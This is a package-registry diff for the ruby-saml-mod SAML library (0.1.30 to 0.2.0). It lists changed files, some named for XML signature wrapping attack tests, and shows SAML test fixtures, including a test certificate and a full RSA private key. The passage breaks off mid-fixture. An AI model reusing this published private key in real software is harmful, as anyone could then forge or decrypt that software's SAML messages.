ruby-saml-mod 0.1.30 → 0.2.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/lib/onelogin/saml.rb +3 -2
- data/lib/onelogin/saml/auth_request.rb +37 -43
- data/lib/onelogin/saml/base_assertion.rb +159 -0
- data/lib/onelogin/saml/logout_request.rb +44 -0
- data/lib/onelogin/saml/logout_response.rb +24 -25
- data/lib/onelogin/saml/response.rb +2 -4
- data/lib/onelogin/saml/settings.rb +23 -17
- data/spec/base_assertion_spec.rb +5 -0
- data/spec/fixtures/logout_request.xml +11 -0
- data/spec/fixtures/logout_response.xml +13 -0
- data/spec/fixtures/test1-cert.pem +21 -0
- data/spec/fixtures/test1-key.pem +15 -0
- data/spec/fixtures/test1-response.xml +62 -0
- data/spec/fixtures/test2-response.xml +70 -0
- data/spec/fixtures/test3-response.xml +9 -0
- data/spec/fixtures/test4-response.xml +57 -0
- data/spec/fixtures/test5-response.xml +48 -0
- data/spec/fixtures/test6-response.xml +9 -0
- data/spec/fixtures/wrong-key.pem +15 -0
- data/spec/fixtures/xml_signature_wrapping_attack_duplicate_ids.xml +11 -0
- data/spec/fixtures/xml_signature_wrapping_attack_response_attributes.xml +45 -0
- data/spec/fixtures/xml_signature_wrapping_attack_response_nameid.xml +44 -0
- data/spec/logout_request_spec.rb +89 -0
- data/spec/logout_response_spec.rb +76 -0
- data/spec/meta_data_spec.rb +39 -0
- data/spec/response_spec.rb +193 -0
- data/spec/spec_helper.rb +33 -0
- data/spec/support/test_server.rb +73 -0
- metadata +77 -10
- data/LICENSE +0 -19
- data/README +0 -7
- data/lib/onelogin/saml/log_out_request.rb +0 -54
- data/ruby-saml-mod.gemspec +0 -33
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
<samlp:LogoutRequest
|
|
2
|
+
xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
|
|
3
|
+
xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
|
|
4
|
+
Version="2.0"
|
|
5
|
+
ID="_cbb63e9741259e3f1c98a1ae38ac5ac25889720b32"
|
|
6
|
+
Destination="http://saml.example.com:8080/opensso/SingleLogoutService"
|
|
7
|
+
IssueInstant="2008-06-03T12:59:57Z">
|
|
8
|
+
<saml:Issuer>http://saml.example.com:8080/opensso</saml:Issuer>
|
|
9
|
+
<saml:NameID>_6a171f538d4f733ae95eca74ce264cfb602808c850</saml:NameID>
|
|
10
|
+
<samlp:SessionIndex>_b976de57fcf0f707de297069f33a6b0248827d96a9</samlp:SessionIndex>
|
|
11
|
+
</samlp:LogoutRequest>
|
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
<samlp:LogoutResponse
|
|
2
|
+
xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
|
|
3
|
+
xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
|
|
4
|
+
ID="_cbb63e9741259e3f1c98a1ae38ac5ac25889720b32" Version="2.0"
|
|
5
|
+
IssueInstant="2008-06-03T12:59:57Z"
|
|
6
|
+
Destination="http://saml.example.com:8080/opensso/SingleLogoutService"
|
|
7
|
+
InResponseTo="_72424ea37e28763e351189529639b9c2b150ff37e5">
|
|
8
|
+
<saml:Issuer>http://saml.example.com:8080/opensso</saml:Issuer>
|
|
9
|
+
<samlp:Status>
|
|
10
|
+
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"> </samlp:StatusCode>
|
|
11
|
+
<samlp:StatusMessage>Successfully logged out from service</samlp:StatusMessage>
|
|
12
|
+
</samlp:Status>
|
|
13
|
+
</samlp:LogoutResponse>
|
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
-----BEGIN CERTIFICATE-----
|
|
2
|
+
MIIDYDCCAsmgAwIBAgIJAK4l0RpJVxtEMA0GCSqGSIb3DQEBBQUAMH4xCzAJBgNV
|
|
3
|
+
BAYTAlVTMQswCQYDVQQIEwJVVDEMMAoGA1UEBxMDU0xDMRQwEgYDVQQKEwtJbnN0
|
|
4
|
+
cnVjdHVyZTEMMAoGA1UECxMDT3BzMQwwCgYDVQQDEwNPcHMxIjAgBgkqhkiG9w0B
|
|
5
|
+
CQEWE29wc0BpbnN0cnVjdHVyZS5jb20wHhcNMTExMTA1MTU0OTA4WhcNMTMxMTA0
|
|
6
|
+
MTU0OTA4WjB+MQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQxDDAKBgNVBAcTA1NM
|
|
7
|
+
QzEUMBIGA1UEChMLSW5zdHJ1Y3R1cmUxDDAKBgNVBAsTA09wczEMMAoGA1UEAxMD
|
|
8
|
+
T3BzMSIwIAYJKoZIhvcNAQkBFhNvcHNAaW5zdHJ1Y3R1cmUuY29tMIGfMA0GCSqG
|
|
9
|
+
SIb3DQEBAQUAA4GNADCBiQKBgQDNVWUJ89UARD2GBLow5+W1EW5LFgI2o4N0fAgJ
|
|
10
|
+
EFV6KPbEokdWrzHlLmfaxdDyIK+QilQqdtg3hU96zIFp8Dk9xnxJNYo1iIzZllrA
|
|
11
|
+
+q95Dwf5sDTioD3IHF2GL0CO1BhA6FX1d3ZuAaIwCI7G4Dw1PjBaUzHr99S9iwBJ
|
|
12
|
+
tHvD6QIDAQABo4HlMIHiMB0GA1UdDgQWBBTCgEaIGTcvWLIi26vv+hycCcYxBjCB
|
|
13
|
+
sgYDVR0jBIGqMIGngBTCgEaIGTcvWLIi26vv+hycCcYxBqGBg6SBgDB+MQswCQYD
|
|
14
|
+
VQQGEwJVUzELMAkGA1UECBMCVVQxDDAKBgNVBAcTA1NMQzEUMBIGA1UEChMLSW5z
|
|
15
|
+
dHJ1Y3R1cmUxDDAKBgNVBAsTA09wczEMMAoGA1UEAxMDT3BzMSIwIAYJKoZIhvcN
|
|
16
|
+
AQkBFhNvcHNAaW5zdHJ1Y3R1cmUuY29tggkAriXRGklXG0QwDAYDVR0TBAUwAwEB
|
|
17
|
+
/zANBgkqhkiG9w0BAQUFAAOBgQBWmVrGPhzKeyz7vkMdSSJZPnZa/KP9sOMzJikm
|
|
18
|
+
7S26qjMnPiqRavnEy1EkN21AEkyZ3HzqtHgaelvusuA95sdBBG/8EAhtN9y6i6j7
|
|
19
|
+
hTMo2gYwdIW/oW74ZjnuzGoHZUba3yPxV6aFoBB+rh2n22PCbfM1lgSwVPhsXz4G
|
|
20
|
+
3CcHYg==
|
|
21
|
+
-----END CERTIFICATE-----
|
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
-----BEGIN RSA PRIVATE KEY-----
|
|
2
|
+
MIICXQIBAAKBgQDNVWUJ89UARD2GBLow5+W1EW5LFgI2o4N0fAgJEFV6KPbEokdW
|
|
3
|
+
rzHlLmfaxdDyIK+QilQqdtg3hU96zIFp8Dk9xnxJNYo1iIzZllrA+q95Dwf5sDTi
|
|
4
|
+
oD3IHF2GL0CO1BhA6FX1d3ZuAaIwCI7G4Dw1PjBaUzHr99S9iwBJtHvD6QIDAQAB
|
|
5
|
+
AoGBAIRISICh6o5yaCRn9T++lhkRsrmC40gqDW1E3rRgJoE91MSXO1hYI8/fFp81
|
|
6
|
+
o8fpUNHQnCqDSAZ0xuB40cLbNTQzLS/z43Jf/LRVEF6EhAspv0iiN+M4NjWZKGaV
|
|
7
|
+
f1dr7ByJgTzbawdUfI5we6YTeu2Titaynj0ujAzZV/UH0A71AkEA/gM+nEQoKu8M
|
|
8
|
+
y2JgKfqjEfanMwFxvgdtz0xu1sLbpLh8ipQ1SvYpcsTIDTViOMT45uKE5Ov6zwla
|
|
9
|
+
H2N5dJdhkwJBAM7wpuk3XX7+nHzYko2w5xm9C6858bqXhl37xJyyqeT5SCSa7+T0
|
|
10
|
+
U91nZuumk3ZaTRdW5BCbcshX+Gyk/ZrOIhMCQBAxgMJRjgX+q2Aj62GBuvegM9SK
|
|
11
|
+
mQe2TYfTpZVHYt1DbZ0gCa23t7i7Vs2Qw6w+0mdVtYcqjBi6zeYGX23RYMUCQCmf
|
|
12
|
+
ohL6veWTVOqPrTquwG0e50DBiOudGrvArlVOYnnZ4jbqqyIEOvInoD357WM62pK9
|
|
13
|
+
OXZVrgq6Fw/TR+dhWt0CQQCU2Aj4q96Uu8+NVUQ++cpi1hOJrlYzjMSu0BbEBGjb
|
|
14
|
+
S1jxgEPxkHc8xZU2X3lr6FgjmlyLje3UaYRh870M1o3x
|
|
15
|
+
-----END RSA PRIVATE KEY-----
|
|
@@ -0,0 +1,62 @@
|
|
|
1
|
+
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="s2ee2ea83c0fcd1d16786bd0d340b1c3e5f1eebb2c" InResponseTo="e034c5ecd6336dd02d1bf61214e6c76feb84ebe785" Version="2.0" IssueInstant="2011-11-05T15:51:58Z" Destination="http://saml.example.com:3000/saml_consume"><saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://saml.example.com:8080/opensso</saml:Issuer><samlp:Status xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
|
|
2
|
+
<samlp:StatusCode xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
|
|
3
|
+
Value="urn:oasis:names:tc:SAML:2.0:status:Success">
|
|
4
|
+
</samlp:StatusCode>
|
|
5
|
+
</samlp:Status><saml:EncryptedAssertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"><xenc:EncryptedData xmlns:xenc="http://www.w3.org/2001/04/xmlenc#" Type="http://www.w3.org/2001/04/xmlenc#Element"><xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes128-cbc"/><ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><xenc:EncryptedKey><xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-1_5"/><xenc:CipherData><xenc:CipherValue>KBYo1dxMpfoQibz6itv/PSuYVDj0EmVx9vtIb6UqDD5aPEBFqxvnt4HKYIEuPpRPZm3dd03fMAnv
|
|
6
|
+
DtkfrR9gWzUdZgTG1VvwqNKN4fBy7VyqyiLFid88iy6omCLDiRGM1OscSol6ieug43+G9rmi/AnK
|
|
7
|
+
mKfEoGwdiZ+GI4F4FB4=</xenc:CipherValue></xenc:CipherData></xenc:EncryptedKey></ds:KeyInfo><xenc:CipherData><xenc:CipherValue>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
|
|
62
|
+
BvoCg4vRGxnjq4Lr2Zx5XmU=</xenc:CipherValue></xenc:CipherData></xenc:EncryptedData></saml:EncryptedAssertion></samlp:Response>
|
|
@@ -0,0 +1,70 @@
|
|
|
1
|
+
<?xml version="1.0"?>
|
|
2
|
+
<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" Version="2.0" ID="s2ee2ea83c0fcd1d16786bd0d340b1c3e5f1eebb2c" InResponseTo="e034c5ecd6336dd02d1bf61214e6c76feb84ebe785" Destination="http://saml.example.com:3000/saml_consume" IssueInstant="2011-11-05T15:51:58Z">
|
|
3
|
+
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://saml.example.com:8080/opensso</saml:Issuer>
|
|
4
|
+
<saml2p:Status xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol">
|
|
5
|
+
<saml2p:StatusCode xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" Value="urn:oasis:names:tc:SAML:2.0:status:Success"></saml2p:StatusCode>
|
|
6
|
+
</saml2p:Status>
|
|
7
|
+
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" Version="2.0" ID="s27f24c1d5b86a127f91bbd226052477719a59f2eb" IssueInstant="2011-11-05T15:51:58Z">
|
|
8
|
+
<saml:Issuer>http://saml.example.com:8080/opensso</saml:Issuer>
|
|
9
|
+
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
|
|
10
|
+
<ds:SignedInfo>
|
|
11
|
+
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
12
|
+
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
|
|
13
|
+
<ds:Reference URI="#s27f24c1d5b86a127f91bbd226052477719a59f2eb">
|
|
14
|
+
<ds:Transforms>
|
|
15
|
+
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
|
|
16
|
+
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
17
|
+
</ds:Transforms>
|
|
18
|
+
<ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
|
|
19
|
+
<ds:DigestValue>eMQal6uuWKMbUMbOwBfrFH90bzE=</ds:DigestValue>
|
|
20
|
+
</ds:Reference>
|
|
21
|
+
</ds:SignedInfo>
|
|
22
|
+
<ds:SignatureValue>
|
|
23
|
+
VK6lHdEHFXiNHZvVyI4MeyVwfqGJNwqmUql9+W5Pygt+uffZU04/yuocEytDipkkyh7eKaq3feon
|
|
24
|
+
858tAt3CKj2byghuG8crrGEzKSawmxaFz0HYWcGIhMwtceeDmoBQZzAn77DV7JytyPkTTvlvTTC5
|
|
25
|
+
BT+2wAss0V5O1rjFGHw=
|
|
26
|
+
</ds:SignatureValue>
|
|
27
|
+
<ds:KeyInfo>
|
|
28
|
+
<ds:X509Data>
|
|
29
|
+
<ds:X509Certificate>
|
|
30
|
+
MIICQDCCAakCBEeNB0swDQYJKoZIhvcNAQEEBQAwZzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNh
|
|
31
|
+
bGlmb3JuaWExFDASBgNVBAcTC1NhbnRhIENsYXJhMQwwCgYDVQQKEwNTdW4xEDAOBgNVBAsTB09w
|
|
32
|
+
ZW5TU08xDTALBgNVBAMTBHRlc3QwHhcNMDgwMTE1MTkxOTM5WhcNMTgwMTEyMTkxOTM5WjBnMQsw
|
|
33
|
+
CQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEUMBIGA1UEBxMLU2FudGEgQ2xhcmExDDAK
|
|
34
|
+
BgNVBAoTA1N1bjEQMA4GA1UECxMHT3BlblNTTzENMAsGA1UEAxMEdGVzdDCBnzANBgkqhkiG9w0B
|
|
35
|
+
AQEFAAOBjQAwgYkCgYEArSQc/U75GB2AtKhbGS5piiLkmJzqEsp64rDxbMJ+xDrye0EN/q1U5Of+
|
|
36
|
+
RkDsaN/igkAvV1cuXEgTL6RlafFPcUX7QxDhZBhsYF9pbwtMzi4A4su9hnxIhURebGEmxKW9qJNY
|
|
37
|
+
Js0Vo5+IgjxuEWnjnnVgHTs1+mq5QYTA7E6ZyL8CAwEAATANBgkqhkiG9w0BAQQFAAOBgQB3Pw/U
|
|
38
|
+
QzPKTPTYi9upbFXlrAKMwtFf2OW4yvGWWvlcwcNSZJmTJ8ARvVYOMEVNbsT4OFcfu2/PeYoAdiDA
|
|
39
|
+
cGy/F2Zuj8XJJpuQRSE6PtQqBuDEHjjmOQJ0rV/r8mO1ZCtHRhpZ5zYRjhRC9eCbjx9VrFax0JDC
|
|
40
|
+
/FfwWigmrW0Y0Q==
|
|
41
|
+
</ds:X509Certificate>
|
|
42
|
+
</ds:X509Data>
|
|
43
|
+
</ds:KeyInfo>
|
|
44
|
+
</ds:Signature>
|
|
45
|
+
<saml:Subject>
|
|
46
|
+
<saml:NameID NameQualifier="http://saml.example.com:8080/opensso" Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">zach@example.com</saml:NameID>
|
|
47
|
+
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
|
|
48
|
+
<saml:SubjectConfirmationData InResponseTo="e034c5ecd6336dd02d1bf61214e6c76feb84ebe785" NotOnOrAfter="2011-11-05T16:01:58Z" Recipient="http://saml.example.com:3000/saml_consume"/>
|
|
49
|
+
</saml:SubjectConfirmation>
|
|
50
|
+
</saml:Subject>
|
|
51
|
+
<saml:Conditions NotOnOrAfter="2011-11-05T16:01:58Z" NotBefore="2011-11-05T15:41:58Z">
|
|
52
|
+
<saml:AudienceRestriction>
|
|
53
|
+
<saml:Audience>http://saml.example.com/saml2</saml:Audience>
|
|
54
|
+
</saml:AudienceRestriction>
|
|
55
|
+
</saml:Conditions>
|
|
56
|
+
<saml:AuthnStatement SessionIndex="s2c57ee92b5ca08e93d751987d591c58acc68d2501" AuthnInstant="2011-11-05T15:51:58Z">
|
|
57
|
+
<saml:AuthnContext>
|
|
58
|
+
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
|
|
59
|
+
</saml:AuthnContext>
|
|
60
|
+
</saml:AuthnStatement>
|
|
61
|
+
<saml:AttributeStatement>
|
|
62
|
+
<saml:Attribute FriendlyName="eduPersonAffiliation" Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
|
63
|
+
<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">member</saml:AttributeValue>
|
|
64
|
+
</saml:Attribute>
|
|
65
|
+
<saml:Attribute FriendlyName="eduPersonPrincipalName" Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
|
66
|
+
<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">user@example.edu</saml:AttributeValue>
|
|
67
|
+
</saml:Attribute>
|
|
68
|
+
</saml:AttributeStatement>
|
|
69
|
+
</saml:Assertion>
|
|
70
|
+
</saml2p:Response>
|
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_32f10e8e465fcef72368e220faeb81db4c72f0c687" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
|
|
2
|
+
<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
3
|
+
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
|
|
4
|
+
<ds:Reference URI="#_32f10e8e465fcef72368e220faeb81db4c72f0c687"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>S6Ne11nB7g1OyQAGYrFEOnu5QAQ=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>mgqZUiA3matrj6Zy4Dl+1ghsgoOl8wPH2mrFM9PAqrYB0skuJUZhYUkCegEbEX9WROEhoZ2bgwJQqeUPyX7leMPe7SSdUDNKf9kiuvpcCYZs1lFSEd51Ec8f+HvejmHUJAU+JIRWpp1VkYUZATihwjGLok3NGi/ygoajNh42vZ4=</ds:SignatureValue>
|
|
5
|
+
<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPl